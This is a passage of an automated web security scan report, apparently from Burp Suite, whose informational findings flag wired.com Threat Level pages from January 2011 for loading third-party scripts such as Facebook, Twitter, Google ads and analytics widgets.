GET /threatlevel/2011/01/secret-tanning-camera/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 04:42:31 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=330
Expires: Wed, 12 Jan 2011 15:32:52 GMT
Date: Wed, 12 Jan 2011 15:27:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 80656

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/threatlevel/2011/01/secret-tanning-camera/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.78. http://www.wired.com/threatlevel/2011/01/vf-wikieaks/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/2011/01/vf-wikieaks/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/2011/01/vf-wikieaks/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:50:43 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=378
Expires: Wed, 12 Jan 2011 15:33:32 GMT
Date: Wed, 12 Jan 2011 15:27:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 86522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/threatlevel/2011/01/vf-wikieaks/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.79. http://www.wired.com/threatlevel/2011/01/video-poker/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/2011/01/video-poker/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/2011/01/video-poker/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 10:56:09 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=343
Expires: Wed, 12 Jan 2011 15:32:51 GMT
Date: Wed, 12 Jan 2011 15:27:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 91723

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/threatlevel/2011/01/video-poker/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.80. http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/2011/01/wikileaks-sunken-treasure/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/2011/01/wikileaks-sunken-treasure/ HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://packetstormsecurity.org/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 04:49:47 +0000
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Cache-Control: must-revalidate, max-age=389
Expires: Wed, 12 Jan 2011 13:06:05 GMT
Date: Wed, 12 Jan 2011 12:59:36 GMT
Connection: close
Content-Length: 90454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.81. http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/&hl=en&client=ca-pub-9817987453265044&adU=Verizon.com&adT=Verizon+Internet+-+%2419.99&adU=www.Brocade.com&adT=Ethernet+Fabrics&adU=www.Comcast.com&adT=Comcast%C2%AE+High+Speed&adU=www.google.com/nexus&adT=The+New+Google+Nexus+S&gl=US/x26usg/x3dAFQjCNGTF4DW2TDGEnchvTvU-Xc_zM5wgQ  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/2011/01/wikileaks-sunken-treasure/&hl=en&client=ca-pub-9817987453265044&adU=Verizon.com&adT=Verizon+Internet+-+%2419.99&adU=www.Brocade.com&adT=Ethernet+Fabrics&adU=www.Comcast.com&adT=Comcast%C2%AE+High+Speed&adU=www.google.com/nexus&adT=The+New+Google+Nexus+S&gl=US/x26usg/x3dAFQjCNGTF4DW2TDGEnchvTvU-Xc_zM5wgQ

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/2011/01/wikileaks-sunken-treasure/&hl=en&client=ca-pub-9817987453265044&adU=Verizon.com&adT=Verizon+Internet+-+%2419.99&adU=www.Brocade.com&adT=Ethernet+Fabrics&adU=www.Comcast.com&adT=Comcast%C2%AE+High+Speed&adU=www.google.com/nexus&adT=The+New+Google+Nexus+S&gl=US/x26usg/x3dAFQjCNGTF4DW2TDGEnchvTvU-Xc_zM5wgQ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:25:30 +0000
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate
Expires: Wed, 12 Jan 2011 15:27:06 GMT
Date: Wed, 12 Jan 2011 15:27:06 GMT
Content-Length: 56148
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.82. http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/&t=WikiLeaks%20Cables%20Cited%20in%20Lawsuit%20Over%20$500%20Million%20Sunken%20Treasure  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/2011/01/wikileaks-sunken-treasure/&t=WikiLeaks%20Cables%20Cited%20in%20Lawsuit%20Over%20$500%20Million%20Sunken%20Treasure

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/2011/01/wikileaks-sunken-treasure/&t=WikiLeaks%20Cables%20Cited%20in%20Lawsuit%20Over%20$500%20Million%20Sunken%20Treasure HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:25:29 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=386
Expires: Wed, 12 Jan 2011 15:33:29 GMT
Date: Wed, 12 Jan 2011 15:27:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 131139

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.83. http://www.wired.com/threatlevel/author/kimzetter/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/author/kimzetter/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/author/kimzetter/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:25:48 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=331
Expires: Wed, 12 Jan 2011 15:33:34 GMT
Date: Wed, 12 Jan 2011 15:28:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.84. http://www.wired.com/threatlevel/category/announcements/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/announcements/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/announcements/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:09:11 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=313
Expires: Wed, 12 Jan 2011 15:33:36 GMT
Date: Wed, 12 Jan 2011 15:28:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 132121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.85. http://www.wired.com/threatlevel/category/atm-hacking/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/atm-hacking/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/atm-hacking/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:09:34 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=310
Expires: Wed, 12 Jan 2011 15:33:36 GMT
Date: Wed, 12 Jan 2011 15:28:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 92611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.86. http://www.wired.com/threatlevel/category/bittorrent/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/bittorrent/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/bittorrent/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:09:17 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=308
Expires: Wed, 12 Jan 2011 15:33:37 GMT
Date: Wed, 12 Jan 2011 15:28:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.87. http://www.wired.com/threatlevel/category/black-hat-conference/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/black-hat-conference/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/black-hat-conference/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:09:21 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=302
Expires: Wed, 12 Jan 2011 15:33:37 GMT
Date: Wed, 12 Jan 2011 15:28:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 102800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.88. http://www.wired.com/threatlevel/category/bradley-manning/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/bradley-manning/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/bradley-manning/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:09:27 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=257
Expires: Wed, 12 Jan 2011 15:32:53 GMT
Date: Wed, 12 Jan 2011 15:28:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 137921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.89. http://www.wired.com/threatlevel/category/breaches/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/breaches/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/breaches/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
